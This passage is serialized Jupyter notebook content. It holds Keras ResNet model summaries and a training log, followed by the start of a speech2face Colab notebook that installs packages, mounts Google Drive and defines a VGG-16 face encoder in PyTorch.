(Add) (None, 20, 20, 512) 0 bk_an23_1[0][0] \n bk_sk2an_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv2_1_1 (Conv2D) (None, 20, 20, 1024) 4719616 bk_add2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_bn_name2_1_1 (BatchNor (None, 20, 20, 1024) 4096 identify_conv2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name2_1_1 ( (None, 20, 20, 1024) 0 identify_bn_name2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_conv2_2_1 (Conv2D) (None, 20, 20, 1024) 9438208 identify_activation_name2_1_1[0][\n__________________________________________________________________________________________________\nidentify_bn_name2_2_1 (BatchNor (None, 20, 20, 1024) 4096 identify_conv2_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_activation_name2_2_1 ( (None, 20, 20, 1024) 0 identify_bn_name2_2_1[0][0] \n__________________________________________________________________________________________________\nidentify_skip2_1_1 (Conv2D) (None, 20, 20, 1024) 4719616 bk_add2_1_1[0][0] \n__________________________________________________________________________________________________\nidentify_add2_1_1 (Add) (None, 20, 20, 1024) 0 identify_activation_name2_2_1[0][\n identify_skip2_1_1[0][0] \n__________________________________________________________________________________________________\nmodel_an_2 (Activation) (None, 20, 20, 1024) 0 identify_add2_1_1[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 20, 20, 1024) 0 model_an_2[0][0] 
\n__________________________________________________________________________________________________\naverage_pooling2d_2 (AveragePoo (None, 20, 20, 1024) 0 dropout_5[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 20, 20, 1024) 0 average_pooling2d_2[0][0] \n__________________________________________________________________________________________________\nflatten_2 (Flatten) (None, 409600) 0 dropout_6[0][0] \n__________________________________________________________________________________________________\ndense_9 (Dense) (None, 512) 209715712 flatten_2[0][0] \n__________________________________________________________________________________________________\ndense_10 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_11 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_12 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_13 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_14 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_15 (Dense) (None, 7) 3591 dense_9[0][0] \n__________________________________________________________________________________________________\ndense_16 (Dense) (None, 7) 3591 dense_9[0][0] \n==================================================================================================\nTotal params: 233,921,585\nTrainable params: 233,911,345\nNon-trainable params: 10,240\n__________________________________________________________________________________________________\n" ], [ 
"plot_model(model, to_file='resnet_model1.png', show_shapes=True, show_layer_names=True, rankdir='TB')", "_____no_output_____" ], [ "'''test model'''\ninputs = np.random.rand(5, 320, 320, 3)\nmodel.predict(inputs)", "_____no_output_____" ], [ "'''compile model'''\nmodel.compile(loss = 'mean_squared_error', optimizer = 'adadelta', metrics = ['accuracy'])", "_____no_output_____" ], [ "'''train model'''\nmodel.fit(X_train, Y_train, batch_size = 8, epochs = 5)", "Epoch 1/5\n1225/1225 [==============================] - 17361s 14s/step - loss: 448879.5567 - acc: 0.0563\nEpoch 2/5\n1225/1225 [==============================] - 17694s 14s/step - loss: 1059.4438 - acc: 0.0498\nEpoch 3/5\n1225/1225 [==============================] - 17632s 14s/step - loss: 1057.5573 - acc: 0.0531\nEpoch 4/5\n1225/1225 [==============================] - 17524s 14s/step - loss: 1052.4273 - acc: 0.0637\nEpoch 5/5\n1225/1225 [==============================] - 17273s 14s/step - loss: 1132.2507 - acc: 0.0506\n" ], [ "model.summary()", "__________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n==================================================================================================\ninput_1 (InputLayer) (None, 320, 320) 0 \n__________________________________________________________________________________________________\nreshape_1 (Reshape) (None, 320, 320, 1) 0 input_1[0][0] \n__________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 157, 157, 64) 3200 reshape_1[0][0] \n__________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 157, 157, 64) 36928 conv2d_1[0][0] \n__________________________________________________________________________________________________\nactivation_1 (Activation) (None, 157, 157, 64) 0 conv2d_2[0][0] 
\n__________________________________________________________________________________________________\ndropout_1 (Dropout) (None, 157, 157, 64) 0 activation_1[0][0] \n__________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 157, 157, 64) 36928 conv2d_1[0][0] \n__________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 157, 157, 64) 36928 dropout_1[0][0] \n__________________________________________________________________________________________________\nadd_1 (Add) (None, 157, 157, 64) 0 conv2d_4[0][0] \n conv2d_3[0][0] \n__________________________________________________________________________________________________\nactivation_2 (Activation) (None, 157, 157, 64) 0 add_1[0][0] \n__________________________________________________________________________________________________\ndropout_2 (Dropout) (None, 157, 157, 64) 0 activation_2[0][0] \n__________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 157, 157, 64) 36928 dropout_2[0][0] \n__________________________________________________________________________________________________\nactivation_3 (Activation) (None, 157, 157, 64) 0 conv2d_5[0][0] \n__________________________________________________________________________________________________\ndropout_3 (Dropout) (None, 157, 157, 64) 0 activation_3[0][0] \n__________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 157, 157, 64) 36928 dropout_2[0][0] \n__________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 157, 157, 64) 36928 dropout_3[0][0] \n__________________________________________________________________________________________________\nadd_2 (Add) (None, 157, 157, 64) 0 conv2d_7[0][0] \n conv2d_6[0][0] 
\n__________________________________________________________________________________________________\nactivation_4 (Activation) (None, 157, 157, 64) 0 add_2[0][0] \n__________________________________________________________________________________________________\ndropout_4 (Dropout) (None, 157, 157, 64) 0 activation_4[0][0] \n__________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 157, 157, 64) 36928 dropout_4[0][0] \n__________________________________________________________________________________________________\nactivation_5 (Activation) (None, 157, 157, 64) 0 conv2d_8[0][0] \n__________________________________________________________________________________________________\ndropout_5 (Dropout) (None, 157, 157, 64) 0 activation_5[0][0] \n__________________________________________________________________________________________________\nconv2d_10 (Conv2D) (None, 157, 157, 64) 36928 dropout_4[0][0] \n__________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 157, 157, 64) 36928 dropout_5[0][0] \n__________________________________________________________________________________________________\nadd_3 (Add) (None, 157, 157, 64) 0 conv2d_10[0][0] \n conv2d_9[0][0] \n__________________________________________________________________________________________________\nactivation_6 (Activation) (None, 157, 157, 64) 0 add_3[0][0] \n__________________________________________________________________________________________________\ndropout_6 (Dropout) (None, 157, 157, 64) 0 activation_6[0][0] \n__________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 157, 157, 64) 36928 dropout_6[0][0] \n__________________________________________________________________________________________________\nactivation_7 (Activation) (None, 157, 157, 64) 0 conv2d_11[0][0] 
\n__________________________________________________________________________________________________\ndropout_7 (Dropout) (None, 157, 157, 64) 0 activation_7[0][0] \n__________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 157, 157, 64) 36928 dropout_6[0][0] \n__________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 157, 157, 64) 36928 dropout_7[0][0] \n__________________________________________________________________________________________________\nadd_4 (Add) (None, 157, 157, 64) 0 conv2d_13[0][0] \n conv2d_12[0][0] \n__________________________________________________________________________________________________\nactivation_8 (Activation) (None, 157, 157, 64) 0 add_4[0][0] \n__________________________________________________________________________________________________\ndropout_8 (Dropout) (None, 157, 157, 64) 0 activation_8[0][0] \n__________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 157, 157, 64) 36928 dropout_8[0][0] \n__________________________________________________________________________________________________\nactivation_9 (Activation) (None, 157, 157, 64) 0 conv2d_14[0][0] \n__________________________________________________________________________________________________\ndropout_9 (Dropout) (None, 157, 157, 64) 0 activation_9[0][0] \n__________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 157, 157, 64) 36928 dropout_8[0][0] \n__________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 157, 157, 64) 36928 dropout_9[0][0] \n__________________________________________________________________________________________________\nadd_5 (Add) (None, 157, 157, 64) 0 conv2d_16[0][0] \n conv2d_15[0][0] 
\n__________________________________________________________________________________________________\nactivation_10 (Activation) (None, 157, 157, 64) 0 add_5[0][0] \n__________________________________________________________________________________________________\ndropout_10 (Dropout) (None, 157, 157, 64) 0 activation_10[0][0] \n__________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 157, 157, 64) 4160 dropout_10[0][0] \n__________________________________________________________________________________________________\nactivation_11 (Activation) (None, 157, 157, 64) 0 conv2d_17[0][0] \n__________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 157, 157, 64) 36928 activation_11[0][0] \n__________________________________________________________________________________________________\nactivation_12 (Activation) (None, 157, 157, 64) 0 conv2d_19[0][0] \n__________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 157, 157, 256 147712 activation_12[0][0] \n__________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 157, 157, 256 16640 dropout_10[0][0] \n__________________________________________________________________________________________________\nadd_6 (Add) (None, 157, 157, 256 0 conv2d_20[0][0] \n conv2d_18[0][0] \n__________________________________________________________________________________________________\nactivation_13 (Activation) (None, 157, 157, 256 0 add_6[0][0] \n__________________________________________________________________________________________________\ndropout_11 (Dropout) (None, 157, 157, 256 0 activation_13[0][0] \n__________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 157, 157, 64) 16448 dropout_11[0][0] 
\n__________________________________________________________________________________________________\nactivation_14 (Activation) (None, 157, 157, 64) 0 conv2d_21[0][0] \n__________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 157, 157, 64) 36928 activation_14[0][0] \n__________________________________________________________________________________________________\nactivation_15 (Activation) (None, 157, 157, 64) 0 conv2d_23[0][0] \n__________________________________________________________________________________________________\nconv2d_24 (Conv2D) (None, 157, 157, 256 147712 activation_15[0][0] \n__________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 157, 157, 256 65792 dropout_11[0][0] \n__________________________________________________________________________________________________\nadd_7 (Add) (None, 157, 157, 256 0 conv2d_24[0][0] \n conv2d_22[0][0] \n__________________________________________________________________________________________________\nactivation_16 (Activation) (None, 157, 157, 256 0 add_7[0][0] \n__________________________________________________________________________________________________\ndropout_12 (Dropout) (None, 157, 157, 256 0 activation_16[0][0] \n__________________________________________________________________________________________________\nconv2d_25 (Conv2D) (None, 157, 157, 64) 16448 dropout_12[0][0] \n__________________________________________________________________________________________________\nactivation_17 (Activation) (None, 157, 157, 64) 0 conv2d_25[0][0] \n__________________________________________________________________________________________________\nconv2d_27 (Conv2D) (None, 157, 157, 64) 36928 activation_17[0][0] \n__________________________________________________________________________________________________\nactivation_18 (Activation) (None, 157, 157, 64) 0 
conv2d_27[0][0] \n__________________________________________________________________________________________________\nconv2d_28 (Conv2D) (None, 157, 157, 256 147712 activation_18[0][0] \n__________________________________________________________________________________________________\nconv2d_26 (Conv2D) (None, 157, 157, 256 65792 dropout_12[0][0] \n__________________________________________________________________________________________________\nadd_8 (Add) (None, 157, 157, 256 0 conv2d_28[0][0] \n conv2d_26[0][0] \n__________________________________________________________________________________________________\nactivation_19 (Activation) (None, 157, 157, 256 0 add_8[0][0] \n__________________________________________________________________________________________________\ndropout_13 (Dropout) (None, 157, 157, 256 0 activation_19[0][0] \n__________________________________________________________________________________________________\nconv2d_29 (Conv2D) (None, 157, 157, 64) 16448 dropout_13[0][0] \n__________________________________________________________________________________________________\nactivation_20 (Activation) (None, 157, 157, 64) 0 conv2d_29[0][0] \n__________________________________________________________________________________________________\nconv2d_31 (Conv2D) (None, 157, 157, 64) 36928 activation_20[0][0] \n__________________________________________________________________________________________________\nactivation_21 (Activation) (None, 157, 157, 64) 0 conv2d_31[0][0] \n__________________________________________________________________________________________________\nconv2d_32 (Conv2D) (None, 157, 157, 256 147712 activation_21[0][0] \n__________________________________________________________________________________________________\nconv2d_30 (Conv2D) (None, 157, 157, 256 65792 dropout_13[0][0] \n__________________________________________________________________________________________________\nadd_9 (Add) (None, 157, 157, 256 0 
conv2d_32[0][0] \n conv2d_30[0][0] \n__________________________________________________________________________________________________\nactivation_22 (Activation) (None, 157, 157, 256 0 add_9[0][0] \n__________________________________________________________________________________________________\ndropout_14 (Dropout) (None, 157, 157, 256 0 activation_22[0][0] \n__________________________________________________________________________________________________\nconv2d_33 (Conv2D) (None, 157, 157, 64) 16448 dropout_14[0][0] \n__________________________________________________________________________________________________\nactivation_23 (Activation) (None, 157, 157, 64) 0 conv2d_33[0][0] \n__________________________________________________________________________________________________\nconv2d_35 (Conv2D) (None, 157, 157, 64) 36928 activation_23[0][0] \n__________________________________________________________________________________________________\nactivation_24 (Activation) (None, 157, 157, 64) 0 conv2d_35[0][0] \n__________________________________________________________________________________________________\nconv2d_36 (Conv2D) (None, 157, 157, 256 147712 activation_24[0][0] \n__________________________________________________________________________________________________\nconv2d_34 (Conv2D) (None, 157, 157, 256 65792 dropout_14[0][0] \n__________________________________________________________________________________________________\nadd_10 (Add) (None, 157, 157, 256 0 conv2d_36[0][0] \n conv2d_34[0][0] \n__________________________________________________________________________________________________\nactivation_25 (Activation) (None, 157, 157, 256 0 add_10[0][0] \n__________________________________________________________________________________________________\ndropout_15 (Dropout) (None, 157, 157, 256 0 activation_25[0][0] \n__________________________________________________________________________________________________\naverage_pooling2d_1 
(AveragePoo (None, 156, 156, 256 0 dropout_15[0][0] \n__________________________________________________________________________________________________\nactivation_26 (Activation) (None, 156, 156, 256 0 average_pooling2d_1[0][0] \n__________________________________________________________________________________________________\nflatten_1 (Flatten) (None, 6230016) 0 activation_26[0][0] \n__________________________________________________________________________________________________\ndense_1 (Dense) (None, 7) 43610119 flatten_1[0][0] \n==================================================================================================\nTotal params: 45,440,199\nTrainable params: 45,440,199\nNon-trainable params: 0\n__________________________________________________________________________________________________\n" ], [ "config_file = 'config_file.pickle'", "_____no_output_____" ], [ "config = model.get_config()\nwith open(config_file, 'wb') as f:\n pickle.dump({'config': config}, f)\n ", "_____no_output_____" ], [ "weights_resnet_1 = 'weights_resnet_1.h5'\nmodel.save_weights(weights_resnet_1)", "_____no_output_____" ], [ "# X = X_train[10]\n# y = model.predict(X.reshape((1, 320, 320)))\nplt.imshow(X_train[10])\nprint(utils.getLabel(root, filename, Y_train[10]))", "云D86999\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e73002633be9611e4154984bf37f82bc4eef9f94
795,921
ipynb
Jupyter Notebook
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
null
null
null
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
1
2021-09-17T18:43:17.000Z
2021-10-03T21:39:40.000Z
old-notebooks/Decoder_damaged.ipynb
antoniomuso/speech2face
19faf467fd39a07725ca874afc8d8b72121d7940
[ "MIT" ]
null
null
null
580.117347
128,914
0.925964
[ [ [ "<a href=\"https://colab.research.google.com/github/antoniomuso/speech2face/blob/master/Decoder_damaged.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "! pip3 install face_recognition\n! pip3 install tensorflow-gpu==1.15\n\nimport numpy as np\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, models, transforms\nfrom PIL import Image\nimport face_recognition\n\nPATH = \"http://www.robots.ox.ac.uk/~albanie/models/pytorch-mcn/vgg_face_dag.pth\"", "Collecting face_recognition\n Downloading https://files.pythonhosted.org/packages/1e/95/f6c9330f54ab07bfa032bf3715c12455a381083125d8880c43cbe76bb3d0/face_recognition-1.3.0-py2.py3-none-any.whl\nRequirement already satisfied: Click>=6.0 in /usr/local/lib/python3.6/dist-packages (from face_recognition) (7.1.2)\nRequirement already satisfied: dlib>=19.7 in /usr/local/lib/python3.6/dist-packages (from face_recognition) (19.18.0)\nRequirement already satisfied: Pillow in /usr/local/lib/python3.6/dist-packages (from face_recognition) (7.0.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from face_recognition) (1.18.5)\nCollecting face-recognition-models>=0.3.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/cf/3b/4fd8c534f6c0d1b80ce0973d01331525538045084c73c153ee6df20224cf/face_recognition_models-0.3.0.tar.gz (100.1MB)\n\u001b[K |████████████████████████████████| 100.2MB 106kB/s \n\u001b[?25hBuilding wheels for collected packages: face-recognition-models\n Building wheel for face-recognition-models (setup.py) ... 
\u001b[?25l\u001b[?25hdone\n Created wheel for face-recognition-models: filename=face_recognition_models-0.3.0-py2.py3-none-any.whl size=100566172 sha256=67b88dced0a76683181a4b88a3c32597e64b711a8bbe5299329077103a3a7c09\n Stored in directory: /root/.cache/pip/wheels/d2/99/18/59c6c8f01e39810415c0e63f5bede7d83dfb0ffc039865465f\nSuccessfully built face-recognition-models\nInstalling collected packages: face-recognition-models, face-recognition\nSuccessfully installed face-recognition-1.3.0 face-recognition-models-0.3.0\nCollecting tensorflow-gpu==1.15\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/a5/ad/933140e74973fb917a194ab814785e7c23680ca5dee6d663a509fe9579b6/tensorflow_gpu-1.15.0-cp36-cp36m-manylinux2010_x86_64.whl (411.5MB)\n\u001b[K |████████████████████████████████| 411.5MB 40kB/s \n\u001b[?25hRequirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.12.1)\nCollecting gast==0.2.2\n Downloading https://files.pythonhosted.org/packages/4e/35/11749bf99b2d4e3cceb4d55ca22590b0d7c2c62b9de38ac4a4a7f4687421/gast-0.2.2.tar.gz\nRequirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.8.1)\nRequirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.9.0)\nCollecting tensorflow-estimator==1.15.1\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/de/62/2ee9cd74c9fa2fa450877847ba560b260f5d0fb70ee0595203082dafcc9d/tensorflow_estimator-1.15.1-py2.py3-none-any.whl (503kB)\n\u001b[K |████████████████████████████████| 512kB 46.3MB/s \n\u001b[?25hRequirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.34.2)\nRequirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.1.2)\nCollecting keras-applications>=1.0.8\n\u001b[?25l Downloading 
https://files.pythonhosted.org/packages/71/e3/19762fdfc62877ae9102edf6342d71b28fbfd9dea3d2f96a882ce099b03f/Keras_Applications-1.0.8-py3-none-any.whl (50kB)\n\u001b[K |████████████████████████████████| 51kB 9.5MB/s \n\u001b[?25hCollecting tensorboard<1.16.0,>=1.15.0\n\u001b[?25l Downloading https://files.pythonhosted.org/packages/1e/e9/d3d747a97f7188f48aa5eda486907f3b345cd409f0a0850468ba867db246/tensorboard-1.15.0-py3-none-any.whl (3.8MB)\n\u001b[K |████████████████████████████████| 3.8MB 49.3MB/s \n\u001b[?25hRequirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.31.0)\nRequirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (3.12.4)\nRequirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.1.0)\nRequirement already satisfied: numpy<2.0,>=1.16.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.18.5)\nRequirement already satisfied: six>=1.10.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (1.15.0)\nRequirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (0.2.0)\nRequirement already satisfied: opt-einsum>=2.3.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow-gpu==1.15) (3.3.0)\nRequirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.8->tensorflow-gpu==1.15) (2.10.0)\nRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (1.0.1)\nRequirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (3.2.2)\nRequirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from 
tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (49.2.0)\nRequirement already satisfied: importlib-metadata; python_version < \"3.8\" in /usr/local/lib/python3.6/dist-packages (from markdown>=2.6.8->tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (1.7.0)\nRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.6/dist-packages (from importlib-metadata; python_version < \"3.8\"->markdown>=2.6.8->tensorboard<1.16.0,>=1.15.0->tensorflow-gpu==1.15) (3.1.0)\nBuilding wheels for collected packages: gast\n Building wheel for gast (setup.py) ... \u001b[?25l\u001b[?25hdone\n Created wheel for gast: filename=gast-0.2.2-cp36-none-any.whl size=7540 sha256=ba60ca4a340916df06d4fed0fd7aa44891b496c279bc6884cf714366808bafc9\n Stored in directory: /root/.cache/pip/wheels/5c/2e/7e/a1d4d4fcebe6c381f378ce7743a3ced3699feb89bcfbdadadd\nSuccessfully built gast\n\u001b[31mERROR: tensorflow 2.3.0 has requirement gast==0.3.3, but you'll have gast 0.2.2 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow 2.3.0 has requirement tensorboard<3,>=2.3.0, but you'll have tensorboard 1.15.0 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow 2.3.0 has requirement tensorflow-estimator<2.4.0,>=2.3.0, but you'll have tensorflow-estimator 1.15.1 which is incompatible.\u001b[0m\n\u001b[31mERROR: tensorflow-probability 0.11.0 has requirement gast>=0.3.2, but you'll have gast 0.2.2 which is incompatible.\u001b[0m\nInstalling collected packages: gast, tensorflow-estimator, keras-applications, tensorboard, tensorflow-gpu\n Found existing installation: gast 0.3.3\n Uninstalling gast-0.3.3:\n Successfully uninstalled gast-0.3.3\n Found existing installation: tensorflow-estimator 2.3.0\n Uninstalling tensorflow-estimator-2.3.0:\n Successfully uninstalled tensorflow-estimator-2.3.0\n Found existing installation: tensorboard 2.3.0\n Uninstalling tensorboard-2.3.0:\n Successfully uninstalled tensorboard-2.3.0\nSuccessfully installed gast-0.2.2 keras-applications-1.0.8 
tensorboard-1.15.0 tensorflow-estimator-1.15.1 tensorflow-gpu-1.15.0\n" ], [ "from google.colab import drive\ndrive.mount('/content/drive')", "Go to this URL in a browser: https://accounts.google.com/o/oauth2/auth?client_id=947318989803-6bn6qk8qdgf4n4g3pfee6491hc0brc4i.apps.googleusercontent.com&redirect_uri=urn%3aietf%3awg%3aoauth%3a2.0%3aoob&scope=email%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdocs.test%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive%20https%3a%2f%2fwww.googleapis.com%2fauth%2fdrive.photos.readonly%20https%3a%2f%2fwww.googleapis.com%2fauth%2fpeopleapi.readonly&response_type=code\n\nEnter your authorization code:\n··········\nMounted at /content/drive\n" ], [ "# Download Dataset\n# Test Set\n# ! wget -x --load-cookies \"/content/drive/My Drive/Speech2Face/cookies.txt\" -O \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" http://zeus.robots.ox.ac.uk/vgg_face2/get_file?fname=vggface2_test.tar.gz\n\n#! tar -zxvf \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" -C \"/content/drive/My Drive/Speech2Face/data_test\"\n# Training Set \n# ! wget -x --load-cookies \"/content/drive/My Drive/Speech2Face/cookies.txt\" -O \"/content/drive/My Drive/Speech2Face/vggface2_test.tar.gz\" http://zeus.robots.ox.ac.uk/vgg_face2/get_file?fname=vggface2_test.tar.gz", "_____no_output_____" ], [ "#VGG-16 Face Encoder Class\n! 
pip install torchfile\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torchfile\n\n\n\nclass VGG_16(nn.Module):\n \"\"\"\n Main Class\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n super().__init__()\n self.block_size = [2, 2, 3, 3, 3]\n self.conv_1_1 = nn.Conv2d(3, 64, 3, stride=1, padding=1)\n self.conv_1_2 = nn.Conv2d(64, 64, 3, stride=1, padding=1)\n self.conv_2_1 = nn.Conv2d(64, 128, 3, stride=1, padding=1)\n self.conv_2_2 = nn.Conv2d(128, 128, 3, stride=1, padding=1)\n self.conv_3_1 = nn.Conv2d(128, 256, 3, stride=1, padding=1)\n self.conv_3_2 = nn.Conv2d(256, 256, 3, stride=1, padding=1)\n self.conv_3_3 = nn.Conv2d(256, 256, 3, stride=1, padding=1)\n self.conv_4_1 = nn.Conv2d(256, 512, 3, stride=1, padding=1)\n self.conv_4_2 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_4_3 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_1 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_2 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.conv_5_3 = nn.Conv2d(512, 512, 3, stride=1, padding=1)\n self.fc6 = nn.Linear(512 * 7 * 7, 4096)\n self.fc7 = nn.Linear(4096, 4096)\n self.fc8 = nn.Linear(4096, 2622)\n\n def load_weights(self, path=\"/content/drive/My Drive/Speech2Face/alt/vgg_weights/vgg_face_torch/VGG_FACE.t7\"):\n\n \"\"\" Function to load luatorch pretrained\n Args:\n path: path for the luatorch pretrained\n \"\"\"\n model = torchfile.load(path)\n counter = 1\n block = 1\n for i, layer in enumerate(model.modules):\n if layer.weight is not None:\n if block <= 5:\n self_layer = getattr(self, \"conv_%d_%d\" % (block, counter))\n counter += 1\n if counter > self.block_size[block - 1]:\n counter = 1\n block += 1\n self_layer.weight.data[...] = torch.tensor(layer.weight).view_as(self_layer.weight)[...]\n self_layer.bias.data[...] = torch.tensor(layer.bias).view_as(self_layer.bias)[...]\n else:\n self_layer = getattr(self, \"fc%d\" % (block))\n block += 1\n self_layer.weight.data[...] 
= torch.tensor(layer.weight).view_as(self_layer.weight)[...]\n self_layer.bias.data[...] = torch.tensor(layer.bias).view_as(self_layer.bias)[...]\n\n def forward(self, x):\n \"\"\" Pytorch forward\n Args:\n x: input image (224x224)\n Returns: class logits\n \"\"\"\n x = F.relu(self.conv_1_1(x))\n x = F.relu(self.conv_1_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_2_1(x))\n x = F.relu(self.conv_2_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_3_1(x))\n x = F.relu(self.conv_3_2(x))\n x = F.relu(self.conv_3_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_4_1(x))\n x = F.relu(self.conv_4_2(x))\n x = F.relu(self.conv_4_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_5_1(x))\n x = F.relu(self.conv_5_2(x))\n x = F.relu(self.conv_5_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc6(x))\n x = F.dropout(x, 0.5, self.training)\n #return self.fc7(x) #new added\n #return F.relu(self.fc7(x))\n\n x = F.relu(self.fc7(x))\n x = F.dropout(x, 0.5, self.training)\n\n x = F.normalize(x, p=2, dim=1)\n return x\n\n #return self.fc8(x) \n\n\n def forward_two(self, x):\n \"\"\" Pytorch forward\n Args:\n x: input image (224x224)\n Returns: class logits\n \"\"\"\n x = F.relu(self.conv_1_1(x))\n x = F.relu(self.conv_1_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_2_1(x))\n x = F.relu(self.conv_2_2(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_3_1(x))\n x = F.relu(self.conv_3_2(x))\n x = F.relu(self.conv_3_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_4_1(x))\n x = F.relu(self.conv_4_2(x))\n x = F.relu(self.conv_4_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv_5_1(x))\n x = F.relu(self.conv_5_2(x))\n x = F.relu(self.conv_5_3(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(x.size(0), -1)\n x = F.relu(self.fc6(x))\n x = F.dropout(x, 0.5, self.training)\n x = F.relu(self.fc7(x))\n x = F.dropout(x, 0.5, self.training)\n return self.fc8(x)", "Collecting torchfile\n Downloading 
